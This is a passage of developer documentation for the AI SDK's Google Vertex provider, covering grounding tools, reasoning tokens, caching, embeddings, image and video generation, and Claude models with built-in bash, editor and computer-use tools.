URL Context allows Gemini models to retrieve and analyze content from URLs. Supported models: Gemini 2.5 Flash-Lite, 2.5 Pro, 2.5 Flash, 2.0 Flash.

import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';

const result = await generateText({
  model: vertex('gemini-2.5-pro'),
  tools: { url_context: vertex.tools.urlContext({}) },
  prompt: 'What are the key points from https://example.com/article?',
});

Google Search

Google Search enables Gemini models to access real-time web information. Supported models: Gemini 2.5 Flash-Lite, 2.5 Flash, 2.0 Flash, 2.5 Pro.

import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';

const result = await generateText({
  model: vertex('gemini-2.5-pro'),
  tools: { google_search: vertex.tools.googleSearch({}) },
  prompt: 'What are the latest developments in AI?',
});

Enterprise Web Search

import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';

const result = await generateText({
  model: vertex('gemini-2.5-flash'),
  tools: {
    enterprise_web_search: vertex.tools.enterpriseWebSearch({}),
  },
  prompt: 'What are the latest FDA regulations for clinical trials?',
});

Google Maps

Google Maps grounding enables Gemini models to access Google Maps data for location-aware responses. Supported models: Gemini 2.5 Flash-Lite, 2.5 Flash, 2.0 Flash, 2.5 Pro, 3.0 Pro.

import { vertex } from '@ai-sdk/google-vertex';
import { type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText } from 'ai';

const result = await generateText({
  model: vertex('gemini-2.5-flash'),
  tools: {
    google_maps: vertex.tools.googleMaps({}),
  },
  providerOptions: {
    vertex: {
      retrievalConfig: {
        latLng: { latitude: 34.090199, longitude: -117.881081 },
      },
    } satisfies GoogleLanguageModelOptions,
  },
  prompt: 'What are the best Italian restaurants nearby?',
});

The optional retrievalConfig.latLng provider option provides location context for queries about nearby places. This configuration applies to any grounding tools that support location context.

Streaming Function Call Arguments

For Gemini 3 Pro and later models on Vertex AI, you can stream function call arguments as they are generated by setting streamFunctionCallArguments to true. This reduces perceived latency when functions need to be called, as tool-input-delta events arrive incrementally instead of waiting for the complete arguments. This option defaults to false.

import { vertex } from '@ai-sdk/google-vertex';
import { type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { streamText } from 'ai';
import { z } from 'zod';

const result = streamText({
  model: vertex('gemini-3.1-pro-preview'),
  prompt: 'What is the weather in Boston and San Francisco?',
  tools: {
    getWeather: {
      description: 'Get the current weather in a given location',
      inputSchema: z.object({
        location: z.string().describe('City name'),
      }),
    },
  },
  providerOptions: {
    vertex: {
      streamFunctionCallArguments: true,
    } satisfies GoogleLanguageModelOptions,
  },
});

for await (const part of result.fullStream) {
  switch (part.type) {
    case 'tool-input-start':
      console.log(`Tool call started: ${part.toolName}`);
      break;
    case 'tool-input-delta':
      process.stdout.write(part.delta);
      break;
    case 'tool-call':
      console.log(`Tool call complete: ${part.toolName}`, part.input);
      break;
  }
}

Reasoning (Thinking Tokens)

Google Vertex AI, through its support for Gemini models, can also emit "thinking" tokens, representing the model's reasoning process. The AI SDK exposes these as reasoning information.

To enable thinking tokens for compatible Gemini models via Vertex, set includeThoughts: true in the thinkingConfig provider option. These options are passed through providerOptions.vertex:

import { vertex } from '@ai-sdk/google-vertex';
import { type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText, streamText } from 'ai';

// For generateText:
const { text, reasoningText, reasoning } = await generateText({
  model: vertex('gemini-2.0-flash-001'), // Or other supported model via Vertex
  providerOptions: {
    vertex: {
      thinkingConfig: {
        includeThoughts: true,
        // thinkingBudget: 2048, // Optional
      },
    } satisfies GoogleLanguageModelOptions,
  },
  prompt: 'Explain quantum computing in simple terms.',
});

console.log('Reasoning:', reasoningText);
console.log('Reasoning Details:', reasoning);
console.log('Final Text:', text);

// For streamText:
const result = streamText({
  model: vertex('gemini-2.0-flash-001'), // Or other supported model via Vertex
  providerOptions: {
    vertex: {
      thinkingConfig: {
        includeThoughts: true,
        // thinkingBudget: 2048, // Optional
      },
    } satisfies GoogleLanguageModelOptions,
  },
  prompt: 'Explain quantum computing in simple terms.',
});

for await (const part of result.fullStream) {
  if (part.type === 'reasoning') {
    process.stdout.write(`THOUGHT: ${part.textDelta}\n`);
  } else if (part.type === 'text-delta') {
    process.stdout.write(part.textDelta);
  }
}

When includeThoughts is true, parts of the API response marked with thought: true will be processed as reasoning.

In generateText, these contribute to the reasoningText (string) and reasoning (array) fields.
In streamText, these are emitted as reasoning stream parts.

File Inputs

The Google Vertex provider supports file inputs, e.g. PDF files.

import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';

const { text } = await generateText({
  model: vertex('gemini-2.5-pro'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model according to this document?',
        },
        {
          type: 'file',
          data: fs.readFileSync('./data/ai.pdf'),
          mediaType: 'application/pdf',
        },
      ],
    },
  ],
});

See File Parts for details on how to use files in prompts.

Cached Content

Google Vertex AI supports both explicit and implicit caching to help reduce costs on repetitive content.

Implicit Caching

import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';

// Structure prompts with consistent content at the beginning
const baseContext =
  'You are a cooking assistant with expertise in Italian cuisine. Here are 1000 lasagna recipes for reference...';

const { text: veggieLasagna } = await generateText({
  model: vertex('gemini-2.5-pro'),
  prompt: `${baseContext}\n\nWrite a vegetarian lasagna recipe for 4 people.`,
});

// Second request with same prefix - eligible for cache hit
const { text: meatLasagna, providerMetadata } = await generateText({
  model: vertex('gemini-2.5-pro'),
  prompt: `${baseContext}\n\nWrite a meat lasagna recipe for 12 people.`,
});

// Check cached token count in usage metadata
console.log('Cached tokens:', providerMetadata.vertex);
// e.g.
// {
//   groundingMetadata: null,
//   safetyRatings: null,
//   usageMetadata: {
//     cachedContentTokenCount: 2027,
//     thoughtsTokenCount: 702,
//     promptTokenCount: 2152,
//     candidatesTokenCount: 710,
//     totalTokenCount: 3564
//   }
// }

Explicit Caching

You can use explicit caching with Gemini models. See the Vertex AI context caching documentation to check if caching is supported for your model.

First, create a cache using the Google GenAI SDK with Vertex mode enabled:

import { GoogleGenAI } from '@google/genai';

const ai = new GoogleGenAI({
  vertexai: true,
  project: process.env.GOOGLE_VERTEX_PROJECT,
  location: process.env.GOOGLE_VERTEX_LOCATION,
});

const model = 'gemini-2.5-pro';

// Create a cache with the content you want to reuse
const cache = await ai.caches.create({
  model,
  config: {
    contents: [
      {
        role: 'user',
        parts: [{ text: '1000 Lasagna Recipes...' }],
      },
    ],
    ttl: '300s', // Cache expires after 5 minutes
  },
});

console.log('Cache created:', cache.name);
// e.g. projects/my-project/locations/us-central1/cachedContents/abc123

Then use the cache with the AI SDK:

import { vertex } from '@ai-sdk/google-vertex';
import { type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text: veggieLasagnaRecipe } = await generateText({
  model: vertex('gemini-2.5-pro'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  providerOptions: {
    vertex: {
      cachedContent: cache.name,
    } satisfies GoogleLanguageModelOptions,
  },
});

const { text: meatLasagnaRecipe } = await generateText({
  model: vertex('gemini-2.5-pro'),
  prompt: 'Write a meat lasagna recipe for 12 people.',
  providerOptions: {
    vertex: {
      cachedContent: cache.name,
    } satisfies GoogleLanguageModelOptions,
  },
});

Safety Ratings

The safety ratings provide insight into the safety of the model's response. See Google Vertex AI documentation on configuring safety filters.

Example response excerpt:

{
  "safetyRatings": [
    {
      "category": "HARM_CATEGORY_HATE_SPEECH",
      "probability": "NEGLIGIBLE",
      "probabilityScore": 0.11027937,
      "severity": "HARM_SEVERITY_LOW",
      "severityScore": 0.28487435
    },
    {
      "category": "HARM_CATEGORY_DANGEROUS_CONTENT",
      "probability": "HIGH",
      "blocked": true,
      "probabilityScore": 0.95422274,
      "severity": "HARM_SEVERITY_MEDIUM",
      "severityScore": 0.43398145
    },
    {
      "category": "HARM_CATEGORY_HARASSMENT",
      "probability": "NEGLIGIBLE",
      "probabilityScore": 0.11085559,
      "severity": "HARM_SEVERITY_NEGLIGIBLE",
      "severityScore": 0.19027223
    },
    {
      "category": "HARM_CATEGORY_SEXUALLY_EXPLICIT",
      "probability": "NEGLIGIBLE",
      "probabilityScore": 0.22901751,
      "severity": "HARM_SEVERITY_NEGLIGIBLE",
      "severityScore": 0.09089675
    }
  ]
}

For more details, see the Google Vertex AI documentation on grounding with Google Search.

Troubleshooting

Schema Limitations

The Google Vertex API uses a subset of the OpenAPI 3.0 schema, which does not support features such as unions. The errors that you get in this case look like this:

GenerateContentRequest.generation_config.response_schema.properties[occupation].type: must be specified

By default, structured outputs are enabled (and for tool calling they are required). You can disable structured outputs for object generation as a workaround:

import { vertex } from '@ai-sdk/google-vertex';
import { type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText, Output } from 'ai';

const result = await generateText({
  model: vertex('gemini-2.5-pro'),
  providerOptions: {
    vertex: {
      structuredOutputs: false,
    } satisfies GoogleLanguageModelOptions,
  },
  output: Output.object({
    schema: z.object({
      name: z.string(),
      age: z.number(),
      contact: z.union([
        z.object({
          type: z.literal('email'),
          value: z.string(),
        }),
        z.object({
          type: z.literal('phone'),
          value: z.string(),
        }),
      ]),
    }),
  }),
  prompt: 'Generate an example person for testing.',
});

The following Zod features are known to not work with Google Vertex:

z.union
z.record

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`gemini-3-pro-preview`
`gemini-2.5-pro`
`gemini-2.5-flash`
`gemini-2.0-flash-001`

Embedding Models

You can create models that call the Google Vertex AI embeddings API using the .embeddingModel() factory method:

const model = vertex.embeddingModel('text-embedding-005');

Google Vertex AI embedding models support additional settings. You can pass them as an options argument:

import {
  vertex,
  type GoogleVertexEmbeddingModelOptions,
} from '@ai-sdk/google-vertex';
import { embed } from 'ai';

const model = vertex.embeddingModel('text-embedding-005');

const { embedding } = await embed({
  model,
  value: 'sunny day at the beach',
  providerOptions: {
    vertex: {
      outputDimensionality: 512, // optional, number of dimensions for the embedding
      taskType: 'SEMANTIC_SIMILARITY', // optional, specifies the task type for generating embeddings
      autoTruncate: false, // optional
    } satisfies GoogleVertexEmbeddingModelOptions,
  },
});

The following optional provider options are available for Google Vertex AI embedding models:

outputDimensionality: number

Optional reduced dimension for the output embedding. If set, excessive values in the output embedding are truncated from the end.
taskType: string

Optional. Specifies the task type for generating embeddings. Supported task types include:
- SEMANTIC_SIMILARITY: Optimized for text similarity.
- CLASSIFICATION: Optimized for text classification.
- CLUSTERING: Optimized for clustering texts based on similarity.
- RETRIEVAL_DOCUMENT: Optimized for document retrieval.
- RETRIEVAL_QUERY: Optimized for query-based retrieval.
- QUESTION_ANSWERING: Optimized for answering questions.
- FACT_VERIFICATION: Optimized for verifying factual information.
- CODE_RETRIEVAL_QUERY: Optimized for retrieving code blocks based on natural language queries.
title: string

Optional. The title of the document being embedded. This helps the model produce better embeddings by providing additional context. Only valid when taskType is set to 'RETRIEVAL_DOCUMENT'.
autoTruncate: boolean

Optional. When set to true, input text will be truncated if it exceeds the maximum length. When set to false, an error is returned if the input text is too long. Defaults to true.

Model Capabilities

Model	Max Values Per Call	Parallel Calls	Multimodal
`text-embedding-005`	2048
`gemini-embedding-2-preview`	2048

Image Models

You can create image models using the .image() factory method. The Google Vertex provider supports both Imagen and Gemini image models. For more on image generation with the AI SDK see generateImage().

Imagen Models

Imagen models generate images using the Imagen on Vertex AI API.

import { vertex } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: vertex.image('imagen-4.0-generate-001'),
  prompt: 'A futuristic cityscape at sunset',
  aspectRatio: '16:9',
});

Further configuration can be done using Google Vertex provider options. You can validate the provider options using the GoogleVertexImageModelOptions type.

import { vertex } from '@ai-sdk/google-vertex';
import { GoogleVertexImageModelOptions } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: vertex.image('imagen-4.0-generate-001'),
  providerOptions: {
    vertex: {
      negativePrompt: 'pixelated, blurry, low-quality',
    } satisfies GoogleVertexImageModelOptions,
  },
  // ...
});

The following provider options are available:

negativePrompt string A description of what to discourage in the generated images.
personGeneration allow_adult | allow_all | dont_allow Whether to allow person generation. Defaults to allow_adult.
safetySetting block_low_and_above | block_medium_and_above | block_only_high | block_none Whether to block unsafe content. Defaults to block_medium_and_above.
addWatermark boolean Whether to add an invisible watermark to the generated images. Defaults to true.
storageUri string Cloud Storage URI to store the generated images.

Additional information about the images can be retrieved using Google Vertex meta data.

import { vertex } from '@ai-sdk/google-vertex';
import { GoogleVertexImageModelOptions } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';

const { image, providerMetadata } = await generateImage({
  model: vertex.image('imagen-4.0-generate-001'),
  prompt: 'A futuristic cityscape at sunset',
  aspectRatio: '16:9',
});

console.log(
  `Revised prompt: ${providerMetadata.vertex.images[0].revisedPrompt}`,
);

Image Editing

Google Vertex Imagen models support image editing through inpainting, outpainting, and other edit modes. Pass input images via prompt.images and optionally a mask via prompt.mask.

Inpainting (Insert Objects)

Insert or replace objects in specific areas using a mask:

import { vertex, GoogleVertexImageModelOptions } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';
import fs from 'fs';

const image = fs.readFileSync('./input-image.png');
const mask = fs.readFileSync('./mask.png'); // White = edit area

const { images } = await generateImage({
  model: vertex.image('imagen-3.0-capability-001'),
  prompt: {
    text: 'A sunlit indoor lounge area with a pool containing a flamingo',
    images: [image],
    mask,
  },
  providerOptions: {
    vertex: {
      edit: {
        baseSteps: 50,
        mode: 'EDIT_MODE_INPAINT_INSERTION',
        maskMode: 'MASK_MODE_USER_PROVIDED',
        maskDilation: 0.01,
      },
    } satisfies GoogleVertexImageModelOptions,
  },
});

Outpainting (Extend Image)

Extend an image beyond its original boundaries:

import { vertex, GoogleVertexImageModelOptions } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';
import fs from 'fs';

const image = fs.readFileSync('./input-image.png');
const mask = fs.readFileSync('./outpaint-mask.png'); // White = extend area

const { images } = await generateImage({
  model: vertex.image('imagen-3.0-capability-001'),
  prompt: {
    text: 'Extend the scene with more of the forest background',
    images: [image],
    mask,
  },
  providerOptions: {
    vertex: {
      edit: {
        baseSteps: 50,
        mode: 'EDIT_MODE_OUTPAINT',
        maskMode: 'MASK_MODE_USER_PROVIDED',
      },
    } satisfies GoogleVertexImageModelOptions,
  },
});

Edit Provider Options

The following options are available under providerOptions.vertex.edit:

mode - The edit mode to use:
- EDIT_MODE_INPAINT_INSERTION - Insert objects into masked areas
- EDIT_MODE_INPAINT_REMOVAL - Remove objects from masked areas
- EDIT_MODE_OUTPAINT - Extend image beyond boundaries
- EDIT_MODE_CONTROLLED_EDITING - Controlled editing
- EDIT_MODE_PRODUCT_IMAGE - Product image editing
- EDIT_MODE_BGSWAP - Background swap
baseSteps number - Number of sampling steps (35-75). Higher values = better quality but slower.
maskMode - How to interpret the mask:
- MASK_MODE_USER_PROVIDED - Use the provided mask directly
- MASK_MODE_DEFAULT - Default mask mode
- MASK_MODE_DETECTION_BOX - Mask from detected bounding boxes
- MASK_MODE_CLOTHING_AREA - Mask from clothing segmentation
- MASK_MODE_PARSED_PERSON - Mask from person parsing
maskDilation number - Percentage (0-1) to grow the mask. Recommended: 0.01.

Imagen Model Capabilities

Model	Aspect Ratios
`imagen-3.0-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
`imagen-3.0-generate-002`	1:1, 3:4, 4:3, 9:16, 16:9
`imagen-3.0-fast-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
`imagen-4.0-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
`imagen-4.0-fast-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
`imagen-4.0-ultra-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9

Gemini Image Models

Gemini image models (e.g. gemini-2.5-flash-image) are multimodal output language models that can be used with generateImage() for a simpler image generation experience. Internally, the provider calls the language model API with responseModalities: ['IMAGE'].

import { vertex } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: vertex.image('gemini-2.5-flash-image'),
  prompt: 'A photorealistic image of a cat wearing a wizard hat',
  aspectRatio: '1:1',
});

Gemini image models also support image editing by providing input images:

import { vertex } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';
import fs from 'node:fs';

const sourceImage = fs.readFileSync('./cat.png');

const { image } = await generateImage({
  model: vertex.image('gemini-2.5-flash-image'),
  prompt: {
    text: 'Add a small wizard hat to this cat',
    images: [sourceImage],
  },
});

You can also use URLs (including gs:// Cloud Storage URIs) for input images:

import { vertex } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: vertex.image('gemini-2.5-flash-image'),
  prompt: {
    text: 'Add a small wizard hat to this cat',
    images: ['https://example.com/cat.png'],
  },
});

Gemini Image Model Capabilities

Model	Image Generation	Image Editing	Aspect Ratios
`gemini-3.1-flash-image-preview`			1:1, 2:3, 3:2, 3:4, 4:3, 4:5, 5:4, 9:16, 16:9, 21:9
`gemini-3-pro-image-preview`			1:1, 2:3, 3:2, 3:4, 4:3, 4:5, 5:4, 9:16, 16:9, 21:9
`gemini-2.5-flash-image`			1:1, 2:3, 3:2, 3:4, 4:3, 4:5, 5:4, 9:16, 16:9, 21:9

Video Models

You can create Veo video models that call the Vertex AI API using the .video() factory method. For more on video generation with the AI SDK see generateVideo().

import { vertex } from '@ai-sdk/google-vertex';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: vertex.video('veo-3.1-generate-001'),
  prompt:
    'A pangolin curled on a mossy stone in a glowing bioluminescent forest',
  aspectRatio: '16:9',
});

You can configure resolution and duration:

import { vertex } from '@ai-sdk/google-vertex';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: vertex.video('veo-3.1-generate-001'),
  prompt: 'A serene mountain landscape at sunset',
  aspectRatio: '16:9',
  resolution: '1920x1080',
  duration: 8,
});

Provider Options

Further configuration can be done using Google Vertex provider options. You can validate the provider options using the GoogleVertexVideoModelOptions type.

import { vertex } from '@ai-sdk/google-vertex';
import { GoogleVertexVideoModelOptions } from '@ai-sdk/google-vertex';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: vertex.video('veo-3.1-generate-001'),
  prompt: 'A serene mountain landscape at sunset',
  aspectRatio: '16:9',
  providerOptions: {
    vertex: {
      generateAudio: true,
      personGeneration: 'allow_adult',
    } satisfies GoogleVertexVideoModelOptions,
  },
});

The following provider options are available:

generateAudio boolean

Whether to generate audio along with the video.
personGeneration 'dont_allow' | 'allow_adult' | 'allow_all'

Whether to allow person generation in the video.
negativePrompt string

A description of what to discourage in the generated video.
gcsOutputDirectory string

Cloud Storage URI to store the generated videos.
referenceImages Array<{ bytesBase64Encoded?: string; gcsUri?: string }>

Reference images for style or asset guidance.
pollIntervalMs number

Polling interval in milliseconds for checking task status.
pollTimeoutMs number

Maximum wait time in milliseconds for video generation.

Model Capabilities

Model	Audio Support
`veo-3.1-generate-001`	Yes
`veo-3.1-fast-generate-001`	Yes
`veo-3.0-generate-001`	Yes
`veo-3.0-fast-generate-001`	Yes
`veo-2.0-generate-001`	No

Google Vertex Anthropic Provider Usage

Provider Instance

You can import the default provider instance vertexAnthropic from @ai-sdk/google-vertex/anthropic:

import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';

If you need a customized setup, you can import createVertexAnthropic from @ai-sdk/google-vertex/anthropic and create a provider instance with your settings:

import { createVertexAnthropic } from '@ai-sdk/google-vertex/anthropic';

const vertexAnthropic = createVertexAnthropic({
  project: 'my-project', // optional
  location: 'us-central1', // optional
});

Node.js Runtime

import { createVertexAnthropic } from '@ai-sdk/google-vertex/anthropic';

const vertexAnthropic = createVertexAnthropic({
  googleAuthOptions: {
    credentials: {
      client_email: 'my-email',
      private_key: 'my-private-key',
    },
  },
});

Optional Provider Settings

You can use the following optional settings to customize the Google Vertex Anthropic provider instance:

project string

The Google Cloud project ID that you want to use for the API calls. It uses the GOOGLE_VERTEX_PROJECT environment variable by default.
location string

The Google Cloud location that you want to use for the API calls, e.g. us-central1. It uses the GOOGLE_VERTEX_LOCATION environment variable by default.
googleAuthOptions object

Optional. The Authentication options used by the Google Auth Library. See also the GoogleAuthOptions interface.
- authClient object An AuthClient to use.
- keyFilename string Path to a .json, .pem, or .p12 key file.
- keyFile string Path to a .json, .pem, or .p12 key file.
- credentials object Object containing client_email and private_key properties, or the external account client options.
- clientOptions object Options object passed to the constructor of the client.
- scopes string | string[] Required scopes for the desired API request.
- projectId string Your project ID.
- universeDomain string The default service domain for a given Cloud universe.
headers Resolvable<Record<string, string | undefined>>

Headers to include in the requests. Can be provided in multiple formats:
- A record of header key-value pairs: Record<string, string | undefined>
- A function that returns headers: () => Record<string, string | undefined>
- An async function that returns headers: async () => Record<string, string | undefined>
- A promise that resolves to headers: Promise<Record<string, string | undefined>>
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Edge Runtime

For Edge runtimes, you can import the provider instance from @ai-sdk/google-vertex/anthropic/edge:

import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic/edge';

To customize the setup, use createVertexAnthropic from the same module:

import { createVertexAnthropic } from '@ai-sdk/google-vertex/anthropic/edge';

const vertexAnthropic = createVertexAnthropic({
  project: 'my-project', // optional
  location: 'us-central1', // optional
});

For Edge runtime authentication, set these environment variables from your Google Default Application Credentials JSON file:

GOOGLE_CLIENT_EMAIL
GOOGLE_PRIVATE_KEY
GOOGLE_PRIVATE_KEY_ID (optional)

Optional Provider Settings

You can use the following optional settings to customize the provider instance:

project string

The Google Cloud project ID that you want to use for the API calls. It uses the GOOGLE_VERTEX_PROJECT environment variable by default.
location string

The Google Cloud location that you want to use for the API calls, e.g. us-central1. It uses the GOOGLE_VERTEX_LOCATION environment variable by default.
googleCredentials object

Optional. The credentials used by the Edge provider for authentication. These credentials are typically set through environment variables and are derived from a service account JSON file.
- clientEmail string The client email from the service account JSON file. Defaults to the contents of the GOOGLE_CLIENT_EMAIL environment variable.
- privateKey string The private key from the service account JSON file. Defaults to the contents of the GOOGLE_PRIVATE_KEY environment variable.
- privateKeyId string The private key ID from the service account JSON file (optional). Defaults to the contents of the GOOGLE_PRIVATE_KEY_ID environment variable.
headers Resolvable<Record<string, string | undefined>>

Headers to include in the requests. Can be provided in multiple formats:
- A record of header key-value pairs: Record<string, string | undefined>
- A function that returns headers: () => Record<string, string | undefined>
- An async function that returns headers: async () => Record<string, string | undefined>
- A promise that resolves to headers: Promise<Record<string, string | undefined>>
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create models that call the Anthropic Messages API using the provider instance. The first argument is the model id, e.g. claude-3-haiku-20240307. Some models have multi-modal capabilities.

const model = anthropic('claude-3-haiku-20240307');

You can use Anthropic language models to generate text with the generateText function:

import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText } from 'ai';

const { text } = await generateText({
  model: vertexAnthropic('claude-3-haiku-20240307'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Anthropic language models can also be used in the streamText function and support structured data generation with Output (see AI SDK Core).

The following optional provider options are available for Anthropic models:

sendReasoning boolean

Optional. Include reasoning content in requests sent to the model. Defaults to true.

If you are experiencing issues with the model handling requests involving reasoning content, you can set this to false to omit them from the request.
thinking object

Optional. See Reasoning section for more details.
metadata object

Optional. Metadata to include with the request. See the Anthropic API documentation for details.
- userId string - An external identifier for the end-user.

Reasoning

Anthropic has reasoning support for the claude-3-7-sonnet@20250219 model.

You can enable it using the thinking provider option and specifying a thinking budget in tokens.

import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText } from 'ai';

const { text, reasoningText, reasoning } = await generateText({
  model: vertexAnthropic('claude-3-7-sonnet@20250219'),
  prompt: 'How many people will live in the world in 2040?',
  providerOptions: {
    anthropic: {
      thinking: { type: 'enabled', budgetTokens: 12000 },
    },
  },
});

console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response

See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.

Cache Control

import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText } from 'ai';

const errorMessage = '... long error message ...';

const result = await generateText({
  model: vertexAnthropic('claude-3-5-sonnet-20240620'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'You are a JavaScript expert.' },
        {
          type: 'text',
          text: `Error message: ${errorMessage}`,
          providerOptions: {
            anthropic: { cacheControl: { type: 'ephemeral' } },
          },
        },
        { type: 'text', text: 'Explain the error message.' },
      ],
    },
  ],
});

console.log(result.text);
console.log(result.providerMetadata?.anthropic);
// e.g. { cacheCreationInputTokens: 2118, cacheReadInputTokens: 0 }

You can also use cache control on system messages by providing multiple system messages at the head of your messages array:

const result = await generateText({
  model: vertexAnthropic('claude-3-5-sonnet-20240620'),
  messages: [
    {
      role: 'system',
      content: 'Cached system message part',
      providerOptions: {
        anthropic: { cacheControl: { type: 'ephemeral' } },
      },
    },
    {
      role: 'system',
      content: 'Uncached system message part',
    },
    {
      role: 'user',
      content: 'User prompt',
    },
  ],
});

For more on prompt caching with Anthropic, see Google Vertex AI's Claude prompt caching documentation and Anthropic's Cache Control documentation.

Tools

Google Vertex Anthropic supports a subset of Anthropic's built-in tools. The following tools are available via the tools property of the provider instance:

Bash Tool: Allows running bash commands.
Text Editor Tool: Provides functionality for viewing and editing text files.
Computer Tool: Enables control of keyboard and mouse actions on a computer.
Web Search Tool: Provides access to real-time web content.

For more background on Anthropic tools, see Anthropic's documentation.

Bash Tool

The Bash Tool allows running bash commands. Here's how to create and use it:

const bashTool = vertexAnthropic.tools.bash_20250124({
  execute: async ({ command, restart }) => {
    // Implement your bash command execution logic here
    // Return the result of the command execution
  },
});

Parameters:

command (string): The bash command to run. Required unless the tool is being restarted.
restart (boolean, optional): Specifying true will restart this tool.

Text Editor Tool

The Text Editor Tool provides functionality for viewing and editing text files:

const textEditorTool = vertexAnthropic.tools.textEditor_20250124({
  execute: async ({
    command,
    path,
    file_text,
    insert_line,
    new_str,
    insert_text,
    old_str,
    view_range,
  }) => {
    // Implement your text editing logic here
    // Return the result of the text editing operation
  },
});

Parameters:

command ('view' | 'create' | 'str_replace' | 'insert' | 'undo_edit'): The command to run. Note: undo_edit is not supported in textEditor_20250429 and textEditor_20250728.
path (string): Absolute path to file or directory, e.g. /repo/file.py or /repo.
file_text (string, optional): Required for create command, with the content of the file to be created.
insert_line (number, optional): Required for insert command. The line number after which to insert the new string.
new_str (string, optional): New string for str_replace command.
insert_text (string, optional): Required for insert command, containing the text to insert.
old_str (string, optional): Required for str_replace command, containing the string to replace.
view_range (number[], optional): Optional for view command to specify line range to show.
max_characters (number, optional): Optional maximum number of characters to view in the file (only available in textEditor_20250728).

Computer Tool

The Computer Tool enables control of keyboard and mouse actions on a computer:

const computerTool = vertexAnthropic.tools.computer_20241022({
  displayWidthPx: 1920,
  displayHeightPx: 1080,
  displayNumber: 0, // Optional, for X11 environments

  execute: async ({ action, coordinate, text }) => {
    // Implement your computer control logic here
    // Return the result of the action

    // Example code:
    switch (action) {
      case 'screenshot': {
        // multipart result:
        return {
          type: 'image',
          data: fs
            .readFileSync('./data/screenshot-editor.png')
            .toString('base64'),
        };
      }
      default: {
        console.log('Action:', action);
        console.log('Coordinate:', coordinate);
        console.log('Text:', text);
        return `executed ${action}`;
      }
    }
  },

  // map to tool result content for LLM consumption:
  toModelOutput({ output }) {
    return typeof output === 'string'
      ? [{ type: 'text', text: output }]
      : [{ type: 'image', data: output.data, mediaType: 'image/png' }];
  },
});

Parameters:

action ('key' | 'type' | 'mouse_move' | 'left_click' | 'left_click_drag' | 'right_click' | 'middle_click' | 'double_click' | 'screenshot' | 'cursor_position'): The action to perform.
coordinate (number[], optional): Required for mouse_move and left_click_drag actions. Specifies the (x, y) coordinates.
text (string, optional): Required for type and key actions.

Web Search Tool

The Web Search Tool provides Claude with direct access to real-time web content:

const webSearchTool = vertexAnthropic.tools.webSearch_20250305({
  maxUses: 5, // Optional: Maximum number of web searches Claude can perform
  allowedDomains: ['example.com'], // Optional: Only search these domains
  blockedDomains: ['spam.com'], // Optional: Never search these domains
  userLocation: {
    // Optional: Provide location for geographically relevant results
    type: 'approximate',
    city: 'San Francisco',
    region: 'CA',
    country: 'US',
    timezone: 'America/Los_Angeles',
  },
});

Parameters:

maxUses (number, optional): Maximum number of web searches Claude can perform during the conversation.
allowedDomains (string[], optional): Optional list of domains that Claude is allowed to search.
blockedDomains (string[], optional): Optional list of domains that Claude should avoid when searching.
userLocation (object, optional): Optional user location information to provide geographically relevant search results.
- type ('approximate'): The type of location (must be approximate).
- city (string, optional): The city name.
- region (string, optional): The region or state.
- country (string, optional): The country.
- timezone (string, optional): The IANA timezone ID.

These tools can be used in conjunction with supported Claude models to enable more complex interactions and tasks.

Model Capabilities

The latest Anthropic model list on Vertex AI is available here. See also Anthropic Model Comparison.

Model	Image Input	Object Generation	Tool Usage	Tool Streaming	Computer Use
`claude-3-7-sonnet@20250219`
`claude-3-5-sonnet-v2@20241022`
`claude-3-5-sonnet@20240620`
`claude-3-5-haiku@20241022`
`claude-3-sonnet@20240229`
`claude-3-haiku@20240307`
`claude-3-opus@20240229`

Google Vertex MaaS Provider Usage

For more information, see the Vertex AI MaaS documentation.

Provider Instance

You can import the default provider instance vertexMaas from @ai-sdk/google-vertex/maas:

